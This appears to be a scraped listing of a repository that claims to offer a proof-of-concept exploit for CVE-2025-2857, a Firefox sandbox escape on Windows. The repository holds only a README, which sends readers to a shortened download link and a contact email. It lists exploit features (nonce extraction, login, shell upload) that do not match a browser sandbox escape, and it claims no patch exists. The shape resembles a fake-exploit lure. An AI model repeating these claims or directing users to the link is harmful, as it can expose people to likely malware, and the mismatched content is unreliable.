CVE-2025-2857 PoC — Mozilla Firefox和Mozilla Firefox ESR 安全漏洞

Source

Associated Vulnerability

Readme

# CVE-2025-2857

## 📖Overview
A sandbox escape vulnerability in Firefox on Windows, discovered by Firefox developers. The vulnerability allows attackers to confuse the parent process into leaking handles into unprivileged child processes, potentially breaking the sandbox security model.

## Exploit:
## [Download here](https://tinyurl.com/nanhrvvy)
## Details
+ **CVE ID**: CVE-2025-2857
+ **Published**: 03/27/2025
+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **Patch Available:  (No official patch yet)**
+ **CVSS**: 10
## Impact
Critical severity vulnerability that enables attackers to potentially: - Escape the browser's sandbox protection - Execute arbitrary code - Compromise system integrity - Gain unauthorized access to system resources This vulnerability specifically targets Firefox on Windows and was being actively exploited in the wild.


## Exploit Features
+ ✅ Automated Exploitation – Extracts nonce, logs in, and uploads the shell automatically.
+ ✅ Version Check – Confirms if the target is vulnerable before exploitation.
+ ✅ Error Handling – Ensures smooth execution even in case of failures.
+ ✅ Session Handling – Uses persistent session management for authentication.
+ ✅ Real-time Feedback – Provides output at each step.



## Contact
+ **For inquiries, please contact:doppler21@outlook.com**
+ **Exploit** :[Download here](https://tinyurl.com/nanhrvvy)

File Snapshot

 [4.0K]  /data/pocs/1820f6e89b7a327335a6d8903c90169ee129b3ca
└── [1.4K]  README.md

0 directories, 1 file

Remarks